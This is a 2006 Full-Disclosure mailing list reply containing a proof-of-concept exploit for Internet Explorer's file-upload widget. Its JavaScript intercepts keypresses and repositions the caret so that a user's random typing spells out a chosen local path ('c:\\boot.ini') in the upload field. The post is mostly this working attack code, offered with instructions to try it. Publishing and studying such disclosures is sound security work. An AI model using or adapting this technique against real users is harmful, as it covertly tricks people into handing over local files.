Re: [Full-disclosure] file upload widgets in IE and Firefox have issues

---

• From: Bart van Arnhem <obliv@xxxxxxx>
• Date: Thu, 08 Jun 2006 18:29:21 +0200

---

Here is another proof of concept for IE only, it allows the characters to be entered in a arbitrary order, since it repositions the caret to make the characters drop in the right place.
Just open this HTML in IE and bash on the keyboard a bit.

- Bart

<html>
<head>
<script type="text/javascript">
var targetFile = "c:\\boot.ini";
window.onload = function ()
{
tempFilled = new Array(targetFile.length + 1).join("\x01");
tempDone = targetFile.toUpperCase();
document.getElementById("target").onkeyup = function () { this.blur(); };

document.getElementById("target").onkeypress = function (e)
{
if (!e) e = window.event;
var pressed = String.fromCharCode(e.keyCode).toUpperCase();
if ((origPos = tempDone.indexOf(pressed)) !== -1)
{
tempFilled = tempFilled.substr(0, origPos) + pressed + tempFilled.substr(origPos + 1);
tempDone = tempDone.replace(pressed, "\x01");
var matches = tempFilled.substr(0, origPos).match(/\x01/g);
tempPos = origPos - (matches == null ? 0 : matches.length);

var range = document.getElementById("target").createTextRange();
range.collapse(true);
range.move("character", tempPos);
range.select();

return true;
}

return false;
}

document.onkeydown = function () { document.getElementById("target").focus() };

}
</script> </head>
<body>
<form method="post" action="">
<input type="file" id="target" />
</form>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

---

• References:
  • [Full-disclosure] file upload widgets in IE and Firefox have issues
    • From: Charles McAuley

• Prev by Date: Re: [Full-disclosure] Advisory - D-Link Access Point
• Next by Date: [Full-disclosure] Want to test this desktop barrier? (Unauthorized offer) 0day protection
• Previous by thread: [Full-disclosure] file upload widgets in IE and Firefox have issues
• Next by thread: [Full-disclosure] file upload widgets in IE and Firefox have issues
• Index(es):
  • Date
  • Thread

---

Relevant Pages Re: javascript creating an array, thats length is the result of a match ... I'm trying to create an array with an unspecified length, ... var v = document.form1.Text_Box.value; ... 'parts' is now an array of the individual characters of 'chop'. ... When writing a document, you should make sure you write valid HTML, including a doctype. ... (comp.lang.javascript) Re: can I know how to write a html parser in C ... Are the lines truly limited to 80 characters of text? ... null-terminated character string size of 249 characters. ... Note too that in the general case it is perfectly acceptable in HTML ... much a beginner at C (and possibly a beginner at programming ... (comp.lang.c) Re: Subject text length limit in system.net.mail? ... Finally figured what it was - Internet Message Filter for Exchange settings ... decided to change the mail server? ... to pre-generated html pages published somewhere. ... AM> stuff for invalid characters that might cause the process to ... (microsoft.public.dotnet.framework.aspnet) Re: [PHP] generating an html intro text ... ... You would have to search out and pull in all closing tags. ... grab 256 characters -- The string. ... html markup should not go towards the string length count, ... (php.general) Re: package javascript ... | hasValidChars:function(string, characters, caseSensitive){ ... One could argue that the empty string always meets the requirement. ... | var cArr = new Array; ... (comp.lang.javascript)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(11)